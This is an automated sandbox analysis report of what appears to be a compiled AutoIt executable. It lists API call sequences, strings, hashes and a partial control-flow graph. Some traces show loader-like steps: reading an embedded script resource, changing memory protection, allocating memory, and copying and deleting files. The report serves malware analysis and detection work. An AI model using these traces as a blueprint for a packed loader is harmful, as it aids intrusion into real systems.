                                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                          • String ID: TaskbarCreated$%
                                          • API String ID: 157504867-3835587964
                                          • Opcode ID: 073713f8bfbb1970cf27dd3db1cae5283948da01879d2b56a820b7e23c7139fa
                                          • Instruction ID: 4efb7fe43e7a10464068840c397b37666a443cb99136859a6ee7f4f59ed3b9ab
                                          • Opcode Fuzzy Hash: 073713f8bfbb1970cf27dd3db1cae5283948da01879d2b56a820b7e23c7139fa
                                          • Instruction Fuzzy Hash: C94125B1214605BFDF286B69EC09B793B58EB44300F08152BF542B63E1CA64EE589773

                                          Control-flow Graph

                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00DD4B2B
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • GetCurrentProcess.KERNEL32(?,00E5FAEC,00000000,00000000,?), ref: 00DD4BF8
                                          • IsWow64Process.KERNEL32(00000000), ref: 00DD4BFF
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DD4C45
                                          • FreeLibrary.KERNEL32(00000000), ref: 00DD4C50
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DD4C81
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DD4C8D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 3051ba537070555c34b52b4f690634e925aea016e90df4b17041072cb05e7a45
                                          • Instruction ID: e1219dca5d2e442751e77b759c8ebcfc6d90b65ea92e233973feb4d766f8cec4
                                          • Opcode Fuzzy Hash: 3051ba537070555c34b52b4f690634e925aea016e90df4b17041072cb05e7a45
                                          • Instruction Fuzzy Hash: 8491813154ABC0DEC731DB6885915AAFFE4AF36300B485D9FE0CA93B41D231E948D769

                                          Control-flow Graph

                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DD4FF9
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DD4EEE,?,?,00000000,00000000), ref: 00DD5010
                                          • LoadResource.KERNEL32(?,00000000,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F), ref: 00E0DD60
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F), ref: 00E0DD75
                                          • LockResource.KERNEL32(00DD4EEE,?,?,00DD4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DD4F8F,00000000), ref: 00E0DD88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 707f21d765b191d2f2aca21112ccce6fceb8f418f0dd44265b8be0de107a6006
                                          • Instruction ID: 3d53e8d56d0a1ebddb6fcaa2b3ec1ddd4df3f013b9c9e5f41e9b9a342ec453bb
                                          • Opcode Fuzzy Hash: 707f21d765b191d2f2aca21112ccce6fceb8f418f0dd44265b8be0de107a6006
                                          • Instruction Fuzzy Hash: 6E115AB5200700BFD7258B66EC58F677BB9EBC9B12F248569F406A62A0DB61E8048671
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: %
                                          • API String ID: 3964851224-2291192146
                                          • Opcode ID: 2644d0862f319c6b04e1b8814a901d7eb224f192f873e160ed18438d27622ce6
                                          • Instruction ID: a291813ce8783ca1422b832f793b694642e53a4740aa00b97a928adeb204253a
                                          • Opcode Fuzzy Hash: 2644d0862f319c6b04e1b8814a901d7eb224f192f873e160ed18438d27622ce6
                                          • Instruction Fuzzy Hash: F2925C746083819FD724EF15C480B6ABBE1FF88304F14996DE98A9B351D771EC85CBA2

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNEL32(?), ref: 00EE81AA
                                          • GetProcAddress.KERNEL32(?,00EE1FF9), ref: 00EE81C8
                                          • ExitProcess.KERNEL32(?,00EE1FF9), ref: 00EE81D9
                                          • VirtualProtect.KERNELBASE(00DD0000,00001000,00000004,?,00000000), ref: 00EE8227
                                          • VirtualProtect.KERNELBASE(00DD0000,00001000), ref: 00EE823C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                          • String ID:
                                          • API String ID: 1996367037-0
                                          • Opcode ID: 48ca31c62502f77867b20b1747144f665381bcfee6d7042a2bb717c4e4c30c01
                                          • Instruction ID: fc0599e8b11ab9c6833516a41d7b38f30b5a8879243d7a2722c53499d466b0f9
                                          • Opcode Fuzzy Hash: 48ca31c62502f77867b20b1747144f665381bcfee6d7042a2bb717c4e4c30c01
                                          • Instruction Fuzzy Hash: 09513E72A457DA4FD7208E79DEC06A1B794EB4132471C1738D5E9EB3C5EFA05C0A8760
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00E0E7C1), ref: 00E346A6
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00E346B7
                                          • FindClose.KERNEL32(00000000), ref: 00E346C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: 2f643e0895660d612839bbb9de8447d2f46aa15680645fd038575b8bec757ae2
                                          • Instruction ID: 71d0894c0f0b50b05e88419f2216d09950e81ade82a65d559adbf03cda03dc7e
                                          • Opcode Fuzzy Hash: 2f643e0895660d612839bbb9de8447d2f46aa15680645fd038575b8bec757ae2
                                          • Instruction Fuzzy Hash: 11E0D8754105005F52147B38EC4E8EA7B9C9F07336F100B15F935E20F0E7B06D54C596
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00E1428C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 9b65502c02486904fdb5405b08c92226ce33684562aa5290625c73ff8a12988c
                                          • Instruction ID: d4339a634d55aec1e6dad8f14a930237fd8445c6fe8d3d3768e080aa05cb7b66
                                          • Opcode Fuzzy Hash: 9b65502c02486904fdb5405b08c92226ce33684562aa5290625c73ff8a12988c
                                          • Instruction Fuzzy Hash: 9BA25D75A04215CFCB24DF58C880AADB7B1FF48304F69806BE956AB351D731ED86CBA1
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE0BBB
                                          • timeGetTime.WINMM ref: 00DE0E76
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE0FB3
                                          • TranslateMessage.USER32(?), ref: 00DE0FC7
                                          • DispatchMessageW.USER32(?), ref: 00DE0FD5
                                          • Sleep.KERNEL32(0000000A), ref: 00DE0FDF
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00DE105A
                                          • DestroyWindow.USER32 ref: 00DE1066
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DE1080
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E152AD
                                          • TranslateMessage.USER32(?), ref: 00E1608A
                                          • DispatchMessageW.USER32(?), ref: 00E16098
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E160AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 4003667617-3242690629
                                          • Opcode ID: 00acb077dd7fb0395df794b8e6c3f3651487cfa35a9ca60b06c1bb6b7efd4c56
                                          • Instruction ID: 41f5ce3f7c498793788a88e67f23b0592dccf9d09df993334d226ec244cf0d20
                                          • Opcode Fuzzy Hash: 00acb077dd7fb0395df794b8e6c3f3651487cfa35a9ca60b06c1bb6b7efd4c56
                                          • Instruction Fuzzy Hash: 4DB2D771608741DFD728DF25C884BAABBE5FF84304F14491EF49AA7291D771E884CBA2

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E391E9: __time64.LIBCMT ref: 00E391F3
                                            • Part of subcall function 00DD5045: _fseek.LIBCMT ref: 00DD505D
                                          • __wsplitpath.LIBCMT ref: 00E394BE
                                            • Part of subcall function 00DF432E: __wsplitpath_helper.LIBCMT ref: 00DF436E
                                          • _wcscpy.LIBCMT ref: 00E394D1
                                          • _wcscat.LIBCMT ref: 00E394E4
                                          • __wsplitpath.LIBCMT ref: 00E39509
                                          • _wcscat.LIBCMT ref: 00E3951F
                                          • _wcscat.LIBCMT ref: 00E39532
                                            • Part of subcall function 00E3922F: _memmove.LIBCMT ref: 00E39268
                                            • Part of subcall function 00E3922F: _memmove.LIBCMT ref: 00E39277
                                          • _wcscmp.LIBCMT ref: 00E39479
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AAE
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AC1
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E396DC
                                          • _wcsncpy.LIBCMT ref: 00E3974F
                                          • DeleteFileW.KERNEL32(?,?), ref: 00E39785
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E3979B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E397AC
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E397BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: eeba44f95c80639e576b43028a4dd6c46dcef01d49eb22f9032f07bb6914add4
                                          • Instruction ID: 95b158bc002f35c66cf8c1a3ad869a04e6d3e9e8a587578ae884cfb4fa863eac
                                          • Opcode Fuzzy Hash: eeba44f95c80639e576b43028a4dd6c46dcef01d49eb22f9032f07bb6914add4
                                          • Instruction Fuzzy Hash: 32C10BB1D00219AADF11DF95DC85AEEBBBDEF55300F0040AAF609F6252DB709A84CF65

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00DD4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E962F8,?,00DD37C0,?), ref: 00DD4882
                                            • Part of subcall function 00DF074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DD72C5), ref: 00DF0771
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DD7308
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E0ECF1
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E0ED32
                                          • RegCloseKey.ADVAPI32(?), ref: 00E0ED70
                                          • _wcscat.LIBCMT ref: 00E0EDC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: a1f38cdb16fd6c6957b88bb23ef9538d969f44c608e9800d2c7b92b24140d227
                                          • Instruction ID: d049c8d7de081105a7a990e6a0824cc37308eaab21fc36cf95b273ebb8b56ad1
                                          • Opcode Fuzzy Hash: a1f38cdb16fd6c6957b88bb23ef9538d969f44c608e9800d2c7b92b24140d227
                                          • Instruction Fuzzy Hash: 0D713CB15283059EC314DF66EC819ABBBE8FF94340B44596FF585A32B1EB30994CCB61

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3A62
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DD3A71
                                          • LoadIconW.USER32(00000063), ref: 00DD3A88
                                          • LoadIconW.USER32(000000A4), ref: 00DD3A9A
                                          • LoadIconW.USER32(000000A2), ref: 00DD3AAC
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD3AD2
                                          • RegisterClassExW.USER32(?), ref: 00DD3B28
                                            • Part of subcall function 00DD3041: GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                            • Part of subcall function 00DD3041: RegisterClassExW.USER32(00000030), ref: 00DD309E
                                            • Part of subcall function 00DD3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                            • Part of subcall function 00DD3041: LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 2880975755-4155596026
                                          • Opcode ID: 286f0c84c5e1d4dd0c335ce31ee5079dec8cd46f6a9e824b2ca10a20976de54b
                                          • Instruction ID: b5a19b9eedb938f741de2bf1b396cf47e69306e0aae21d26954cb58f4113d501
                                          • Opcode Fuzzy Hash: 286f0c84c5e1d4dd0c335ce31ee5079dec8cd46f6a9e824b2ca10a20976de54b
                                          • Instruction Fuzzy Hash: AF214870A10308AFEB109FA6EC09B9D7BB4FB08711F00016BF504BA2B0D3BA56588F94

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                          • API String ID: 1825951767-3513169116
                                          • Opcode ID: c38569aa55d05b8a2a94a92bf61df7c54dd6c3fc917d605984b0e81e7dbc8ea1
                                          • Instruction ID: 425eb3855d93e325ea38cdae21a007804c4dfef7fa92169cbf2fbd4c80e67319
                                          • Opcode Fuzzy Hash: c38569aa55d05b8a2a94a92bf61df7c54dd6c3fc917d605984b0e81e7dbc8ea1
                                          • Instruction Fuzzy Hash: 92A13D719102299ACB15EBE0CC91EEEB778FF14300F44052BF412B7291EB759A09CB71

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DD309E
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                          • LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 975902462-1005189915
                                          • Opcode ID: 66181aa056ec8632819035e6485dc188b9fafffee40eb3363f8976661399c3be
                                          • Instruction ID: 2a4b990a77052a22ecdd4a2589126d8ecc18e95f049d7dec166bd2c85251f55c
                                          • Opcode Fuzzy Hash: 66181aa056ec8632819035e6485dc188b9fafffee40eb3363f8976661399c3be
                                          • Instruction Fuzzy Hash: 403134B1805309AFDB10CFA5E889ADDBBF4FB09311F14496BE590F62A0D7B50549CF91

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DD3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DD309E
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD30AF
                                          • LoadIconW.USER32(000000A9), ref: 00DD30F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 975902462-1005189915
                                          • Opcode ID: 3347bd03e401fb390d35161aaee9fe0f6bb2ea8f5af9868393402d6247c6e5f6
                                          • Instruction ID: 6c09e7f69575dfd8484e234c0166d07ffc97f6e9d17012c6f38c0a14696b3bf4
                                          • Opcode Fuzzy Hash: 3347bd03e401fb390d35161aaee9fe0f6bb2ea8f5af9868393402d6247c6e5f6
                                          • Instruction Fuzzy Hash: D121C0B1911318AFDB14DFA6E889BDEBBF4FB08711F00452BFA10B62A0D7B145488F95

                                          Control-flow Graph

                                          Basic blocks (id: address range; calls and APIs; successors), recovered from the graph data:
                                          • 1016: 1153588-11535da; call 1153488; CreateFileW → 1019, 1020
                                          • 1019: 11535e3-11535f0 → 1023, 1024
                                          • 1020: 11535dc-11535de → 1021
                                          • 1021: 115373c-1153740 (common exit block; every path ends here)
                                          • 1023: 1153603-115361a; VirtualAlloc → 1025, 1026
                                          • 1024: 11535f2-11535fe → 1021
                                          • 1025: 1153623-1153649; CreateFileW → 1028, 1029
                                          • 1026: 115361c-115361e → 1021
